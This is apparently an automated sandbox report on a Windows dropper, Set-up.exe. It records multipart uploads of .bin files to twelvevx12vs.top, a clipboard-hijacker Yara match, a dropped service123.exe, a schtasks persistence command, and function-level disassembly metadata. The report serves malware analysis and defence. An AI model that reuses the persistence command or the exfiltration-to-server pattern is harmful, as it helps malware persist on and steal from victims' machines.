Sep 30, 2024 15:17:17.579781055 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 38 31 37 36 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 65 72 Data Ascii: ------Boundary68176922Content-Disposition: form-data; name="file"; filename="Qerayig.bin"Content-Type: application/octet-stream$;C0OQBpR&]f'9=@!\|y!\Ci^2[L_uRy4DP#f3k}a/
Sep 30, 2024 15:17:17.585021973 CEST	1236	OUT	Data Raw: 49 0c de 9f d3 d0 45 61 b7 b9 83 1e c7 dd 88 d3 c0 68 69 ec 17 d7 bf d0 53 e9 f1 98 cf 03 12 a3 6c 41 98 32 19 68 55 c9 86 8a 55 98 30 59 9b c5 32 db 21 96 20 32 1e 72 63 9f e3 96 ce 64 d7 da 4d a3 c6 dc d0 6a ad 80 16 47 21 1a 1c f6 ef 46 62 2e Data Ascii: IEahiSlA2hUU0Y2! 2rcdMjG!Fb.y1B%G+W2AHe+G;\/"j\XMz>4olZ/I5d-89\@#(pmX6zxC!)T[$OWN9xmXmE-
Sep 30, 2024 15:17:17.585227013 CEST	2472	OUT	Data Raw: 38 ea 8f f1 4e 6e 2c 1e 08 6d 23 78 f9 7c 11 6a 30 b5 2a 82 11 4b be de bf e3 34 78 2b 6c 6b 9a 99 5c 07 55 49 7a bf 9a 94 7e 00 17 09 92 fa 10 99 9d 00 dd a5 05 b9 8e c7 a6 de ff f1 c9 25 7b ae 07 a3 3f ed 19 8a 37 ae 93 ef 3f 54 7e 03 3b 77 1d Data Ascii: 8Nn,m#x\|j0K4x+lk\UIz~%{?7?T~;w^@!HqZ_}2B;"aqr93qg@v8\|oDRB4)ZG<PoD:-K].nCJJO]]5w9Aclvl7F_-
Sep 30, 2024 15:17:17.585305929 CEST	2472	OUT	Data Raw: ac 6a fc f2 3c 31 9b d7 2a 91 dc 5a e5 c9 f6 74 fa 34 29 f0 c1 6a 31 58 ae 20 21 4a 68 5d 4f d0 76 a1 80 06 0e 1b ca 1e dc ab 49 4e c1 05 04 69 05 0e 7b 25 f9 eb 79 7b b2 2b a5 cd e9 72 51 43 9c 54 fc 86 98 03 05 64 1d 10 1e 40 e7 bf 25 20 d1 85 Data Ascii: j<1*Zt4)j1X !Jh]OvINi{%y{+rQCTd@% <zkOZ2ppxs2Z%<p,j-duWIF2p^FV$Eh#\|k)C$p}AT:%os5dG63R,NeGj
Sep 30, 2024 15:17:17.585321903 CEST	4944	OUT	Data Raw: cb be 00 5a c8 ed 6d ba e0 79 9b c6 e1 2a 64 de d3 c0 c1 79 ab 16 97 51 27 61 1f 54 da 85 05 2f 62 91 35 6d cf 3a d5 01 c1 bd da 59 ce 8c ea 88 a6 a1 a9 eb cf 4d 43 ae eb 69 f9 01 8d 77 a6 df 10 db f5 e6 40 c2 36 f1 09 60 36 01 32 35 89 72 44 0b Data Ascii: Zmy*dyQ'aT/b5m:YMCiw@6`625rD)e\&{,jAmh+Cy1!(ba9TvZ/H$gtXgc.l!#31a&RW:\1B:?PT/2?@G6]" %P2G',(
Sep 30, 2024 15:17:17.585510969 CEST	2472	OUT	Data Raw: 86 2b ab 9b 36 fa 5d 6e 2a 77 dd 42 bf e7 0f 50 be 74 3a 18 b0 61 88 72 73 26 6d 4e 38 ba 2c 0c 90 02 df a5 72 b8 d6 b7 29 3b cd 97 02 1e c0 32 e9 f7 4c 95 19 2a 3b f9 c0 f1 37 66 8e be 9f 07 13 f8 29 8e 11 ed 92 ef db a6 ce 26 c5 b5 5d 35 a4 1a Data Ascii: +6]nwBPt:ars&mN8,r);2L;7f)&]59/N2{17o]w/K1e=Z#v;/6$0B!Jt#M9DhXvOlP]sg4o )3p$@[(0{&\|"Y!96F
Sep 30, 2024 15:17:17.585591078 CEST	2472	OUT	Data Raw: 1c c8 ea 98 7b d8 28 70 cb cd a9 81 f0 75 1b e2 de 2a 0c 3d 3b de ef ee 59 f0 5f 58 62 d6 37 71 85 03 bc 30 49 e1 c1 8b f3 cb c4 03 70 00 95 b2 93 04 f2 8e ce 11 3d 0b 02 92 bd d4 13 67 b5 9f 05 28 50 b9 55 e2 4c 48 9d 2d 0f 47 82 e7 3f 9c 85 31 Data Ascii: {(pu*=;Y_Xb7q0Ip=g(PULH-G?16\|PrGV$,s\|n!E7%p1iE[\|7&;T-XMgKjoeN:wWo]fSJ$TpnwGA0ZtQsP3r&H_^rB
Sep 30, 2024 15:17:17.585669041 CEST	2472	OUT	Data Raw: 04 81 95 70 5f ec d7 4f 52 6d 5d 39 58 c3 3d 63 0e 3e ae 92 57 05 45 00 71 45 39 24 47 07 54 3f ed 07 96 d0 3d 62 ec f5 80 20 1a f0 d2 a0 d5 1e 8e 8b 9c 06 7e cb 05 67 a4 d4 f6 65 b1 b7 7c 6f 91 bf a2 61 36 d9 ff 6c b7 8a 3a d8 e1 53 de 4b af 1c Data Ascii: p_ORm]9X=c>WEqE9$GT?=b ~ge\|oa6l:SK^*hB^p1Bs%Y6p:{2/%V?HYN.d`SYhh!o'"^?'q#jS??xQEc"0aQ
Sep 30, 2024 15:17:17.585694075 CEST	2472	OUT	Data Raw: 56 a8 6a 73 0a b1 45 e7 8c 90 06 74 e0 0f 86 1b 57 dc fe 61 e9 f6 5a 95 c4 69 ef 91 b9 ef 1f f0 ed b6 58 ce 64 03 36 d0 3e 8b 09 25 fd 9f c0 7f c3 46 3f 84 b4 0e 42 73 6e 89 55 cd eb 3f ae 59 6e 78 ec 31 3d e7 73 f1 47 79 86 7a 12 09 2f c2 4d 15 Data Ascii: VjsEtWaZiXd6>%F?BsnU?Ynx1=sGyz/MN!km~(P4"_$E">(u[zRNE'```5&^6wKefD^X:O#@86njTMyA{N;Nmv!(,_[wOmXY
Sep 30, 2024 15:17:17.585694075 CEST	1236	OUT	Data Raw: 03 bb e5 63 34 7a 19 74 14 f3 6a 79 6e 59 ca 1f d9 79 98 53 fd 07 ce 3e 19 0d f3 14 b8 c9 bf 9e b2 c3 38 5a e6 4f ce 81 e9 6f 90 88 ed f2 2e 2a 78 41 92 de 22 34 c9 66 46 c5 3d 1f d0 40 45 43 22 9a 04 74 de 1f 6c 5b 8d 48 6c 56 18 ee 71 af e2 6b Data Ascii: c4ztjynYyS>8ZOo.*xA"4fF=@EC"tl[HlVqka!g_CuA\|]WRu(bm1=yGt.]KR5 L`~3RsMhY@j`Il-sRU$KFOXg&5gqqy0jC
Sep 30, 2024 15:17:18.502485991 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 30 Sep 2024 13:17:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	84.38.182.221	80	4816	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:17:21.670046091 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary70233283 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30029 Host: twelvevx12vs.top
Sep 30, 2024 15:17:21.670089960 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 30 32 33 33 32 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 61 6b Data Ascii: ------Boundary70233283Content-Disposition: form-data; name="file"; filename="Kakiqorol.bin"Content-Type: application/octet-stream*sZ}S5UrbiD-DVk!.tb"sv'sM)Gp4T/M.l:ZIySpyReC
Sep 30, 2024 15:17:21.674943924 CEST	1236	OUT	Data Raw: cc 80 7a bd ed 98 d9 d4 96 b7 54 ec cc 76 2b 1a 17 d7 e6 2b 62 23 5f e9 5f 2b 9e 88 2f 84 83 8b f9 4d 87 d0 fc 56 3a 19 bf 03 84 95 61 6b cf a0 fc ed fc 77 04 74 3f 9d 63 94 e1 34 8d 9c c3 51 2c 19 38 69 96 c4 80 e1 88 14 34 51 ed 0e 0a a2 0d f8 Data Ascii: zTv++b#__+/MV:akwt?c4Q,8i4QfajCYo%zUZU)Ya#G5O'sN*[,q7O#p+\4[w$">ufm_7D"5ae=ZwH#,;F}u-=`HoJO~<
Sep 30, 2024 15:17:21.674994946 CEST	2472	OUT	Data Raw: bb 7c 11 96 f6 e0 99 4f a5 40 b4 b8 ba b0 e1 6e e0 f0 66 1f 73 fa 38 5f 45 12 c3 9b aa b8 cb 36 7e 63 75 8c 88 ae 5d 24 b4 38 4f 92 2e 23 47 e9 06 57 ba 0c af 07 b8 76 5b 11 82 09 71 fa bd c2 2c 39 b2 fe 25 67 5b 01 bd f8 65 62 b3 14 35 a8 12 d2 Data Ascii: \|O@nfs8_E6~cu]$8O.#GWv[q,9%g[eb56GGv``B?t7>gn+Z>&,U_ak}=0J46)EllBAoQP#{ b0yi:F=wWCEA[7L@V3
Sep 30, 2024 15:17:21.675017118 CEST	4944	OUT	Data Raw: c9 eb 73 e9 1f 4c 83 04 12 f5 0e 16 73 dc 76 34 3e 32 9b 48 fe 1f cb 46 41 a4 14 42 f4 83 9d 0f e8 ee f1 39 93 df fa 86 47 68 26 20 e6 9e 2e 9e 65 55 46 8e 24 ea 8f bb 29 e4 30 98 7f 76 1f 15 0e 7e 46 07 18 da 37 08 31 ce c6 6f e8 19 b3 b4 f1 b8 Data Ascii: sLsv4>2HFAB9Gh& .eUF$)0v~F71oXyW8nAMs(Oa#a&Ij?t"c6s`9z0BCX&0`QQLv!?);,QhRvKE 5Qi0["4f7UwVvQ)p
Sep 30, 2024 15:17:21.675061941 CEST	2472	OUT	Data Raw: 5d a3 af f5 fa 8a f7 2c ba bc 46 f9 7a da 06 a0 44 d9 11 ba de 5c f7 85 5b 9f 1e 2e 51 cc 95 95 c3 f0 a1 06 c5 c7 a8 8f b4 5f ac 53 ef 9d 4c c5 ab 34 88 7a d0 c0 ed ca 94 97 fb 5a df 3d c6 7c bd ea 22 08 76 cd 90 02 27 e5 2d 4b ef d6 9f 64 32 44 Data Ascii: ],FzD\[.Q_SL4zZ=\|"v'-Kd2DDG87d==DCC;zZy"$M>XSp^WUGyukCd@,57IerA-0Np]d.{-,g%T(28D*O?guCZ
Sep 30, 2024 15:17:21.675192118 CEST	2472	OUT	Data Raw: 91 a6 69 8f da 18 4b 67 52 9b ca ee b3 a2 79 e9 d8 f7 58 4d 8b cd 25 f9 c2 77 5d e1 7f b3 4b ad 95 d6 43 d9 a4 c4 5d 84 d4 a9 42 b5 df 2d 6d 77 1c ed 25 dd a6 6a 52 e2 7a 39 49 34 5a a4 94 7d 04 b7 1b 60 69 bc cf 2f 2d a9 b8 25 14 61 7f 2d 44 29 Data Ascii: iKgRyXM%w]KC]B-mw%jRz9I4Z}`i/-%a-D)S0L<~{Pbaep8T@[8"k>XQ\;HZ0]6*%KjmpK5!yFzMS\|l+M;N4XjYi#a
Sep 30, 2024 15:17:21.675295115 CEST	4944	OUT	Data Raw: 76 04 0a db 74 5c 09 88 2a 45 c0 ce 41 c5 b1 7b a8 14 33 9d e2 5b 10 2f 08 42 c7 2f df 47 15 9f 74 02 b7 fa b9 d8 4c 04 24 30 3e fc 0b 80 f3 23 0e 74 bb c2 d3 c4 69 95 10 c8 a2 1b 7d 4b ae f6 23 c4 9d 09 a1 c1 35 49 73 1c 08 d0 e5 2d e0 30 be 8a Data Ascii: vt\*EA{3[/B/GtL$0>#ti}K#5Is-0@I\d'`>^Tw`Jyog'Ud:&tD{?~sW\|y/<[}GDDi,i'}ysV>+=-?]9`b
Sep 30, 2024 15:17:21.675295115 CEST	365	OUT	Data Raw: 60 09 32 a3 33 9f 20 ba 2a 9a 74 e5 d1 0a d2 e3 bc d4 0f b5 02 85 4e 14 e0 e4 38 70 d9 5d 43 ed 24 bf 0c 34 a3 a3 6c cf c2 46 f1 49 f3 d5 cd 73 ce 8f 60 67 ef a2 f1 0e 16 79 a4 ad c1 2e 68 33 06 7f 56 aa 6a 6a 23 6f a1 2a bb c9 a9 68 73 b3 99 58 Data Ascii: `23 tN8p]C$4lFIs`gy.h3Vjj#ohsXVwZ3kW'?K!pLrRDwY;g+4XJ;^V29PoIOftV8 Ahg#K\b^s#HA\|i8~2
Sep 30, 2024 15:17:22.491621017 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 30 Sep 2024 13:17:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	09:17:03
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xea0000
File size:	9'991'168 bytes
MD5 hash:	FB481C39EA41B8BD7743BF3A9D730E76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2649593570.000000000451B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:18:05
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x10000
File size:	314'617'856 bytes
MD5 hash:	6959DF077AFAD94D152558F4AAE964E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:18:05
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xa40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:18:05
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:18:08
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x10000
File size:	314'617'856 bytes
MD5 hash:	6959DF077AFAD94D152558F4AAE964E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:19:02
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x10000
File size:	314'617'856 bytes
MD5 hash:	6959DF077AFAD94D152558F4AAE964E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.4%
Total number of Nodes:	125
Total number of Limit Nodes:	4

Executed Functions

Function 6C3414B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C3414CD
_exit.MSVCRT ref: 6C34151A
_write.MSVCRT ref: 6C34156A
_close.MSVCRT ref: 6C341579

Strings

,pFl, xrefs: 6C414AED
@, xrefs: 6C414AB1
CONOUT$, xrefs: 6C3414C6
terminated, xrefs: 6C341540

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,pFl$@$CONOUT$
API String ID: 28676597-3000292839
Opcode ID: c6010060a9e166a19d66a4755475f34cedbfb8b3ff5150829919021432ea14b9
Instruction ID: 3fc5e54feb499f912ec7c81421970d14820f05924aa228c915f710e680d187ba
Opcode Fuzzy Hash: c6010060a9e166a19d66a4755475f34cedbfb8b3ff5150829919021432ea14b9
Instruction Fuzzy Hash: 3F416AB09083058FDB00EFB9C444AAEBBF4AB49358F108A2DE8A9D7B40E335D505CF56

Function 0001116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 000111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00011238
__p__acmdln.MSVCRT ref: 00011261
malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344
GetStartupInfoA.KERNEL32 ref: 00011433

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 7c92894f255011d8943dd39e6aa0eef362033c59e980fdbd8a2b6499b01c19c3
Instruction ID: 6ff836ee3c014c5787fa6f15569644a6223ac0f5ac6a614633a1976257cf596a
Opcode Fuzzy Hash: 7c92894f255011d8943dd39e6aa0eef362033c59e980fdbd8a2b6499b01c19c3
Instruction Fuzzy Hash: 5681B3719083158FEB55DF64E8843EEB7F0FB48344F00852DEA858B312D779A989CB82

Function 000115B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 000115CD
_exit.MSVCRT ref: 0001161A
_write.MSVCRT ref: 0001166A
_close.MSVCRT ref: 00011679

Strings

terminated, xrefs: 00011640
@, xrefs: 00018341
CONOUT$, xrefs: 000115C6

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 606137219ab9de188348e3c2177baf50fb690c15bf3849b3680b39b5abf0fe47
Instruction ID: 80520d33f084635f7c51a92e8408f2db704cdf09635138902d88ec2f601cc020
Opcode Fuzzy Hash: 606137219ab9de188348e3c2177baf50fb690c15bf3849b3680b39b5abf0fe47
Instruction Fuzzy Hash: 564149B09083049FDB50DF78C8446EEBBE4AF88354F04CA2DE998D7250E739CA85CB52

Function 6C359C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C359EB0: GetClipboardSequenceNumber.USER32 ref: 6C359EBE

Sleep.KERNELBASE ref: 6C359BFF
GetClipboardSequenceNumber.USER32 ref: 6C359C08

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: f79b7e99d004897ead9f5aa0f33a4cd6df0b07031d943e1d4e937d8a6d9a9892
Instruction ID: da599f4d90a41f3a74fe3fd446621d2e816d96c449a1e1e6928f99aa24ddd676
Opcode Fuzzy Hash: f79b7e99d004897ead9f5aa0f33a4cd6df0b07031d943e1d4e937d8a6d9a9892
Instruction Fuzzy Hash: 4E41E5B19083018ADB00FF74D1889AEBBF4AF45708F81492DE8D687A44EB35955ECF93

Function 000181E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0001138E,?,?,00006EA2,0001138E), ref: 00018271
GetProcAddress.KERNEL32 ref: 0001828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0001138E,?,?,00006EA2,0001138E), ref: 0001829D

Strings

Failed to get function address. Error code: %d, xrefs: 000182E0
MKVIvKRgpiDipzneQxBu, xrefs: 0001827E
UwGCIJbIlmBudMOlmBudMOlckMv.dll, xrefs: 0001824A

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$MKVIvKRgpiDipzneQxBu$UwGCIJbIlmBudMOlmBudMOlckMv.dll
API String ID: 145871493-318618175
Opcode ID: ed366fe70559d1db8c32dda21327bbb44709a8bc78c399b6eebb2ce905a3d85c
Instruction ID: 364d8b6b8f060ec39b7643b4e8886073bf8de3c7896976cc6db4e9c8edd08b3b
Opcode Fuzzy Hash: ed366fe70559d1db8c32dda21327bbb44709a8bc78c399b6eebb2ce905a3d85c
Instruction Fuzzy Hash: 5031C572909600AFEB05EFB4DD495DEBBF4FB89300F01C928E94583201EB79D685CB92

Function 00018230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0001138E,?,?,00006EA2,0001138E), ref: 00018271
GetProcAddress.KERNEL32 ref: 0001828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0001138E,?,?,00006EA2,0001138E), ref: 0001829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0001138E,?,?,00006EA2,0001138E), ref: 000182BD
GetLastError.KERNEL32 ref: 000182DA
FreeLibrary.KERNEL32 ref: 000182F3

Strings

MKVIvKRgpiDipzneQxBu, xrefs: 0001827E
UwGCIJbIlmBudMOlmBudMOlckMv.dll, xrefs: 0001824A
Failed to load DLL. Error code: %d, xrefs: 000182C3

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$MKVIvKRgpiDipzneQxBu$UwGCIJbIlmBudMOlmBudMOlckMv.dll
API String ID: 1397630947-1684447200
Opcode ID: 99c17cb3a6bad6dc34c0b90d2bf940ab0222ef75cdc5b0602c86dec55f72b37b
Instruction ID: 1eaa92df780f0a7edd14cc44c102f18da5f84784c1885761aa6d0c0ba17c7861
Opcode Fuzzy Hash: 99c17cb3a6bad6dc34c0b90d2bf940ab0222ef75cdc5b0602c86dec55f72b37b
Instruction Fuzzy Hash: 6F11E272905640AFE706AFB4DD0A5DEBBF0EB4A300F00C628D95583141EF7AD6818B83

Function 000113C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00011238
__p__acmdln.MSVCRT ref: 00011261
malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344
_amsg_exit.MSVCRT ref: 000113EA
_initterm.MSVCRT ref: 0001140C

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: b25b254da9d12dec3eb71745c36396888e6445805f5351787b2aa54d56b84383
Instruction ID: 90bc7ad6d75ffbe3f69186a2771d4e8820fd69aa4ac429100a0bc450bfea8686
Opcode Fuzzy Hash: b25b254da9d12dec3eb71745c36396888e6445805f5351787b2aa54d56b84383
Instruction Fuzzy Hash: 85411CB49083158FEB56EF64E4843DDBBF0BB48340F11852EEA8597352D778A985CF42

Function 000111A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 000111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00011238
__p__acmdln.MSVCRT ref: 00011261
malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344
_amsg_exit.MSVCRT ref: 000113EA
_initterm.MSVCRT ref: 0001140C

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

